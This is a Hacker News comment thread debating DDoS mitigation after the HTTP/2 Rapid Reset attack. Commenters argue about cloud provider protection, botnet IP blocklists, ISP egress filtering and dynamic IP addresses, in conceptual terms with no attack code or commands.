Businesses suffer from too much transparency. Got that part. They buy things that don't work and sometimes hurt people, even if they don't intend to do this. So far, so good. Where is the part where new businesses models are supposed to exist because some people made bad choices and the current models don't work? Why don't we just publicize the bad choices and let things work themselves out?

Sorry. Missing it.


Amazon definitely cares if they lose 1% of sales.

Guess who has more votes, you or Amazon.


I’m aware. Doesn’t make it sting less being in the receiving end of attacks all the time and seeing everyone collectively shrug.


Ok, that is somewhat fair.

My personal want / solution would simply be "everything gets an IPV6, and IPV4 gets deprecated. Everything using IPV4 gets an algorithm slapped on top to covert it into IPV6.

Dynamic ips become a thing of the past.

But I realize that is significantly easier said than done. (Makes Minecraft servers easier to setup though)


"Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good." "As we can see, many new IPs spotted on a given day disappear very quickly afterwards." https://blog.cloudflare.com/technical-breakdown-http2-rapid-...


Great solution for a world without shared and dynamic ips.


Not as bad as one may think. It's proper feedback which can be acted upon.

Every reasonable connectivity provider would pay attention to this info, or face intense complaints from its users with shared and dynamic IPs. It would identify sources of attacks, and block them at higher granularity level, reporting that the range has been cleared. (If a provider lied, everyone would stop believing it, and the disgruntled customers would leave it.)

For shared hosting providers it would mean blocking specific user accounts using a firewall, notifying users, and maybe even selling cleanup services.

For home internet users, it also would mean blocking specific users, contacting them, helping them identify the infected machine at home.

It would massively drive patching of old router firmware which is often cracked and infected. Same for IoT stuff, infected PCs, malicious apps on phones, etc. There would be an incentive to stay clean.


If the one doing the blocking is not at FAANG it would do nothing of sorts. And FAANG benefit from DDoS by getting people into their walled cloud gardens.


Funny man, thinks big ISP cares you yourself blocked your own site from your own customers coming from the big ISP network.


No; with a shared hosting, somebody else manages to blacklist the IP that serves many paying customers.


Block the whole subnet and make it the ISP's problem?


It's interesting to me that most of the push-back so far has been for the business model of the internet, ie people need link traversal and content publishing in order to make money from advertising (implied, but not stated). Therefore we need to add yet another layer to the mix, the cloud providers, and start paying those guys.

And yes, we can block entire subnets. You own the IP addresses, you're responsible for stuff coming out of them, at least to the degree that it's not maliscious to the web as a whole. (but not the content itself, of course)

I'm calling bullshit on these assumptions. The internet is a communications tool. If it's not communicating, it's broken. If you provide dynamic IPs to clients that attack people, you're breaking it. It's not my problem or something I should ever be expected to pay for.

To be clear, my point is that we're suggesting yet another layer of commercial, paid crap on top of a broken system in order to fix it. It'd be phenomenally better just to publicly identify place and methods where it's broken and let other folks with more vested interests than information consumers worry about it. Hell, I'm not interested in paying for the current busload of bytes I'm currently consuming for every one sentence of value I receive.


Because when a single machine is infected, at one ISP, it's a good idea to block the whole subnet? I don't think any commercial activity could afford such security strategy, blindly blocking legit users by thousands.


So it’s the ISPs fault that my grandma never met a spam email that she didn’t want to click?

One of the things that gets lost in this kind of debate is that the vast, vast majority of Internet users are not experts in how the Internet, computers, or their phones work. So expecting them to be able to "just not get exploited" is a naive strategy and bringing the pain to the ISP feels counterproductive because what, realistically, can they do to stop all of their unsophisticated users from getting themselves exploited?

At the end of the day, the vast majority of the users of the Internet do not care how it works - they want their email, they want their cat videos, and they want to check up on their high school ex on Facebook. How can we rearchitect the Internet to be a) open b) privacy protecting, and c) robust against these kinds of attacks so that the targets of DDOS attacks have better protection than paying a third party and hoping that that third party can protect them?


How does the ISP solve it? Send a mass mail/email telling people to reset their devices because someone has a device with botnet malware?


That is their problem. Maybe the price needs to go up if you don't secure all your devices as the ISP is going to send a tech to your house. Or maybe the ISP has deep enough pockets to find a sue those cheap IOT device makers for not being secure thus funding their tech support team.


Egress filtering? A botnet DDOS stream should not look like normal network traffic...


> Sorry citizen, google services are inaccessible because the only ISP in your city sold a service to a bad actor.

> We might fix this, we might not, you DONT have a choice.

> Thank you for your continued business.


Indistinguishable from the kind of service I get from Google - the moment that I need a human involved I just close my account with whatever Google service is misbehaving and move on.


But you have other options which is my point.

(swap in any corpo-service provider you personally like the most)

Blanket banning subnet ranges from services because of the actions of someone else is 3rd world shit.


Hacker News nerds will argue all day long that the Internet is a utility when the argument happens to personally benefit them, then in the same breath say that a random network admin is justified in blocking a whole ISP subnet due to one “bad” actor. And of course by bad actor I mean person that almost certainly accidentally got themselves infected with malware by not understanding the completely Byzantine world of computers and the Internet.


Well, if someone had somehow gotten their house wires damaged in a way that causes brownouts to neighbours, wouldn't the electric company be justified in cutting off the house?


I‘m sure comcast is terrified that their users won’t be able to read my blog.


You are quite obviously speaking from the perspective as someone that wouldn’t be in a position to be making these calls.


Banning a large number of customers for an entire month? doesn’t make economic sense, it’ll be cheaper to just pay a big cloud provider for protection.

(not to mention the number of false positives you'd get, etc etc)


And now some of your services don't work because you blocked IP that turned out to be cloud service IP being reused for legit service


I propose to make a special "reject" packet. When a host, let's say 1.1.1.1, sends such packet to 2.2.2.2, all providers that see this packet, MUST reject any traffic from 2.2.2.2 to 1.1.1.1. This is very easy but very efficient and allows a single host to withstand the attack of any size.

There is no need for any central authority and no need to maintain any lists.


And then that can be abused...


No, it cannot. It is well-thought.


There are 2^128 ipv6 addresses.

If you store 1 bit (banned/unbanned) + a unix timestamp (ban expiration) for each of those IPs, that requires more storage space than exists many billion times over.

To store such a block table you propose would require more memory for routers than any router has ever had and ever will have.

An attacker could easily "flush" all entries in this table by, for example, banning a TB of ipv6 addresses from talking to them, surely resulting in all participating routers dropping other bans to store some of those.


We can store an IP address with a mask (ban subnets instead of separate addresses). Also, IPv6 is so rarely used, that I would ban whole address space for the time of attack.

For example, if an attack is coming from a country you where you don't have many paying customers, but where there are many infected devices due to use of pirated outdated software, it is easier to ban the whole country than to figure out who is infected and who is not.


> An attacker could easily "flush" all entries in this table by, for example, banning a TB of ipv6 addresses

We can set a limit of ban records per host to prevent it.


ban the entire /64. If banning the /64 is not enough, then ban the /48. If that is not enough, keep going up 4 bits until it is (most IPv6 allocations line up on a nibble boundary, hence the 4 bits)


That actually sounds like a really good idea. This is already implemented in the physical world (in a much less efficient way) in the form of “no spam” stickers and registrations.

Is there a reason other than inertia for why it hasn’t been implemented?


The main problem is how do you authenticate the request as being legitimate? It's already possible to spoof headers and "FROM-IP" (in fact, major DDoS attacks use just this as a replay attack, spoof a DNS request as coming from 1.1.1.1 and get a much larger response sent TO 1.1.1.1 from wherever).


You can send back a reply with a token to confirm ban.


ISPs do not want to spend money for fighting against criminals.


That doesn’t sound convincing to me. I mean I understand they don’t want to spend money but if cost is the only barrier it seems like that could be overcome somehow by interested parties.


It's not the costs, it's that some ISPs like getting money from spammers and criminals, and carefully look the other way.

And the other ISPs like getting paid for DDoS mitigation, so they also look the other way. There's no money to be made fixing the underlying problem.


That would be giving away some of the secret sauce on the part of the cloud providers. They are selling security as (part of their) service. There are some community shared lists of botnets ofcourse, but they may not be vry real time or very up to date.


You're assuming that identification of attack traffic is 100% correct which is unfortunately not the reality.


Nothing "forces botnets to up their game", they just want to make money (or in some cases, "watch the world burn"); I don't see how any coordination whatsoever would diminish these motivations.


So the email spam solution? Doesn't that come with its own list of problems?

Also, stupid question from someone not that familiar with DDoS, can't you flood the target with requests even if the source address will be rejected? Or even if the IP packet has a falsified source address?


Yes.


It's worth noting that features like the one that enabled Rapid Reset are pushed into standards by the exact same companies, because they are needed for performance at their scale.

So in a way this was partially caused by the existence of insanely big tech companies that need such features.


Either I misunderstood the issue, but it sounds like rapid reset was not the cause.


Rapid Reset is the name given to the technique behind the attack. The cause is a flaw in HTTP/2 stream multiplexing that enables this technique.


The actual solutions are:

1) Egress filtering by the ISPs

2) Better malware resistance and vulnerability mitigation on easily-compromised appliance and IoT devices

But neither is going to happen. 1 is a coordination problem. It has to be all or nothing, which can only be compelled by law, and we have no global laws and no global law enforcement mechanism. Some countries inevitably don't care and the rest won't partition the entire Internet by permanently cutting them off. 2 would probably make the entire Internet of Things and a whole lot of home computing just not happen because it isn't economically feasible. Poor security effectively acts as a tacit tax. We all pay a little bit each, but the tax is collected by criminals instead of governments.

Note that even your proposed solution here only works if 1 happened. Otherwise, source IP spoofing easily defeats a blocklist.


The problem with this type of attack is that you can't really catch it as MITM DDoS protection.

You're not seeing any SYN flood, just a bunch of TCP connections (equivalent of say search crawler), that are encrypted. Only after unpacking on loadbalancer those are visible as one TCP stream sheltering thousand HTTP2 streams.


For a side-hobby of mine (writing), I imagine what would happen if current trends would continue. Thus, big caveat, it's all just thought experiments, not realistic predictions of any kind.

For this particular scenario, the public Internet would get so bad ("enshitified") that people would tend to leave it alone. For essential public services, governments would set up their own networks disconnected from the Internet, where all devices and their connections must be authenticated to a person or corporation[^1]. Maybe something equivalent would exist for corporations and to enable e-commerce.

[^1] China works like this already, to a high degree.


You heard of New IP? The Huawei/Chinese plan to reform the Internet that keeps getting criticized for a variety of reasons. I haven't had the times to read the proposals proper, but the stuff about build trust directly into the network seems like it could solve this problem, at a price.

> Having security and trust be “intrinsic” to the network will require core layers to carry metadata about the users, applications and services being transported. If users need to register in order to have packets sent to their destination, the result is that network operators, and those who license the operators, can remove individual users’ access at any time.

https://dnsrf.org/.k-media/d3c1d810de1e98bdf7af7aa52406e837.... (critical of the proposal)


I've witnessed a few sustained (hours/days long) DDOS attacks that were straight up extortion: owners contacted with "give us money or we will keep your site offline".

Most of the time I see attacks lasting 15-20 minutes. I'm assuming it's either someone doing it "for the lulz" or some cyber warfare outfit testing their big guns.

I always consider the possibility of someone using DDOS to mask a more sophisticated attack.


Plenty of even quite-large websites just don't get attacked by DDoS attacks, because nobody has any particular reason to attack them.


You’re completely wrong.

All large sites regularly get attacked.

The average skiddie’s motivations are that they’re bored. So they DoS a site they use regularly just to see.

Heck they generally don’t even mean to cause damage per-se, and just think it’s a funny use of their evening.

You have to stop thinking DoS attacks are always particularly personal. They really often just aren’t, and it’s a monumental pain in the ass to be on the receiving end.


I run boring sites like government websites which say what kinds of recycling go in which color trash cans.

Well used, but never attacked.


Well, lucky you. Or unlucky me and everyone I know running a large website. Guess we’ll never know.


A spamhaus-like blacklist for botnet IPs is an interesting idea.

What if Google and Cloudflare collectively reverse-DoSed all the infected IPs, not by sending them any traffic, but simply by refusing to accept any connections from them to any part of their infrastructure?

Whoever is on those IPs will suddenly find that half the internet doesn't work anymore. Which is probably a good enough incentive for them to replace their router, format their PC, or whatever else is necessary to disinfect themselves.

In many parts of the world, landline IP allocations tend to be stable enough for this to have a real effect. Phones are a different story, but phones are also much less likely to be useful in a DDoS botnet. (The owner would immediately notice the sudden heat and data usage.)

If we're going to live in a world where a small number of companies own half the internet, at least they could use their power to do some good.


Google already does this. "Something on your network is causing unusual traffic, please fill in this captcha to continue".

And then you have to fill in a new captcha every 5 minutes or so just to keep using google maps/gmail/search.

It's kinda annoying, and usually the culprit is someone else who shares my IP, not me (ie. a school, university, workplace, open wifi).


For any googlers reading: This behaviour sometimes hits an ajax request (map data downloads when panning or zooming). The client side javascript then fails badly and the user sees a broken site rather than a captcha request.

Plz fix.


We don't need to share a block-list, but yes, blocking all traffic from open proxies (which nearly all the large attacks of the 2020s have used) is definitely part of the long-term plan. Any legitimate users of those proxies will experience some short-term pain, but they'll patch and life will go on.


> In many parts of the world, landline IP allocations tend to be stable enough for this to have a real effect.

And what about CGNAT?


In that scenario, it's on the ISP to clean their network of abuse, the same thing they would need to do if Gmail had blacklisted their IPs for spamming. After all, an ISP that can't connect to YouTube isn't going to stay in business for long.

People have been begging ISPs for ages to do a bit of egress filtering, for example, to prevent source address falsification. They've demonstrated time and again that they don't give a crap unless it affects their bottom line.


OK, but how should an ISP distinguish a good HTTP/2 connection from a bad one (I'm talking about this particular attack)? As far as I can tell, the DoS starts after the connection from bot to server is established, at which point the connection is fully encrypted. Should all ISPs MITM their clients to ensure that all traffic is good and proper?


Ever had your droplet suspended for using a vulnerable WordPress plugin?

Your droplet suddenly tries to log into somebody else's server 10 times a second. The target of the attack complains to DigitalOcean, "hey, one of your customers is trying to hack me!" and attaches a log of the login attempts. DigitalOcean assumes that the report was made in good faith, forwards it to you and immediately suspends your droplet. It won't be reactivated until you reply with evidence that you have at least tried to clean up the problem. If it happens again, you won't get off so easily.

I suppose that a similar system, in a more real-time fashion, could be set up between the maintainers of the blacklist (Google, Cloudflare, Amazon, etc.) and the ISPs. No need for the ISPs to sniff on everyone's traffic if they can rely on good-faith reports from the lion's mouth that somebody from port 52384 on 11.22.33.44 is DDoSing a Google property. Even with CGNAT, the port will identify the customer responsible.


Proliferation of low cost computing is the cause of this, not big players being able to mitigate this.

This is not coming from "known botnet IPs", this is from random infected devices. Some aren't even permanently doing this, just one request from a device per day - it already large enough to cause issues.


We could also treat it as a public security threat and act accordingly.


I think this is the key take away. Unfortunately world leaders are not tech savvy enough to even consider this a threat.


Yet. But we're getting there.


Which jurisdiction are you referring to with “we”?


Any that matters, I guess ("we" as in the collective of people).


> I'd really wish for them to come through some community coordinated list of botnet infected IPs or something.

The problem is that IP addresses are not a reliable identifier, especially for the kinds of folks whose routers have been infected by malware. Few ISPs hand out static IP addresses anymore. It's why online games no longer bother with IP bans anymore, because as soon as the target reboots their router they evade your ban and some other poor sap on the same ISP gets stuck with the flagged IP.


DDoS attacks were growing in size and frequency before these companies started creating products to address them. They took down sites, demanded ransom, and cost a lot of money in lost business and hosting bills.

If you want to complain about an actual working solution, that's your right, but realize that without an alternate solution you're advocating for giving small gangs the ability to disrupt everyone else's lives on a whim.


This is akin to the argument that bike helmets makes people less safe (and invariably has a comment about the Dutch and their safety record)


It is like saying effective spam filters are bad for email as a distributed system.

It's the spam that killed email, not the filters.


It’s a prisoner dilemma! The only way to win is for both service providers and “bad people” to not escalate. That’s not going to happen.


The typical way of dealing with "bad people" is to subject them to the criminal justice system (or vigilantism if the problem is bad enough and the criminal justice system is inadequate). This tends to reduce, but not eliminate, the misbehaving.

Improving the ability to track down and prosecute perpetrators tends to result in less anonymity/privacy, so that makes the problem challenging.

Thinking in the long/very-long term, we need to get more innovative with the underlying technology to mitigate abuse. I mentioned this effort https://named-data.net in another part of the thread.


>but I'd really wish for them to come through some community coordinated list of botnet infected IPs or something.

Using any kind of community coordinated IP ban is useless and would hurt a lot of people, millions(or even billions) of devices have dynamic IP addresses.

You would not stop botnets from DDoSing you and on top of that you'd block millions of legitimate users.


Do you remember the pre-DDoS mitigation days? Botnets could easily bring down major, important sites and make them unavailable to users. This caused monetary loss and could even cause life loss depending on the site. How is the previous state better than, well, not suffering from these problems?


> pay Google, Amazon or Cloudflare a protection tax.

Just FYI: hetzner has free DDoS https://www.hetzner.com/unternehmen/ddos-schutz

I'm sure other hosting companies also offers it.


Doesn't really work for those types of attacks

> In this final layer, we filter out attacks in the form of SYN floods, DNS floods, and invalid packets. We are also able to flexibly adapt to other unique attacks and to reliably mitigate them.

Which means any legit http2 connection will go just fine.

Even if such connection now triggers hundreds of substreams.

Push for end to end encrypted internet also means you can't really stop any more advanced attack. You could have just few dozen of hosts doing 20-30 connections each (i.e. "looking perfectly normal" for DDoS protection provider) generating tens of thousands per second in http2 streams.

I'm speaking from experience of mitigating attack like this. Our DDoS provider was near-useless..


For the higher layer attacks you have to have something like the "modified cryptominer in the browser" things that cloud flare and friends do now - those interstitial pages that pop up for a few seconds are doing mathematical hashing to burn processor time on your end - which greatly complicates the ability to DDoS.


Only for mini DDoS attacks - for larger ones they disable routing for your ip address. I guess they don‘t have the capacity to handle the big DDoS attacks nowadays.


Yep, and null-routing your IP is exactly what providers did in the days GP is longing for, and still do do, especially outside of big cloud providers.


> The fact that large cloud providers can handle huge DDoS attacks I think in the long run leads to a worse internet

Don't agree.

> the only solutions available are to pay Google, Amazon or Cloudflare a protection tax.

It's not.

> come through some community coordinated list of botnet infected IPs

How would that help?


A protection tax? You realize that DDoS protection costs them providers real money?


Yes, but cloud providers share that protection over all customers. Someone hosting their own websites needs the same level of protection just for themselves.

DDoS is really the only thing that you can't host yourself on your own machines in today's internet.


I don't think they do. There are a variety of DDoS attacks which require more expensive computing to detect


Leave it to HN to find the fly in the ointment when Google is mentioned.


In less words, it’s DDoS attackers that make the internet a worst place


Just like the law enforcement forced the criminals to up their games, so the only option we have is to pay tax?

Well, I wrote this comment to ridicule yours... but actually that was what happened.


> Cloudflare a protection tax

$NET gives away DDOS protection for free for non-businesses


I smell what you're stepping in here, but I grow more comfortable with the idea of big conglomerates continuing to improve their attack mitigation efforts on behalf of their locales when I compare this to the concept to vaccines.

Vaccines inevitably lead to stronger viruses, but would you argue we should go back and not have began to use them?

Cloudflare and Google may be some sites' only hope to staying alive in the event of network-driven attacks. I suppose this landscape is a double-edged sword.


[flagged]


There is Marek's disease, so you still need to show that GP is in the wrong.


One is about machines on the internet serving images and forum posts. This comment is low quality and is a form of name calling.


I was writing it with a "using antibiotics in absolutely every mundane product causes superbugs" energy actually, which is something that is really a problem.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: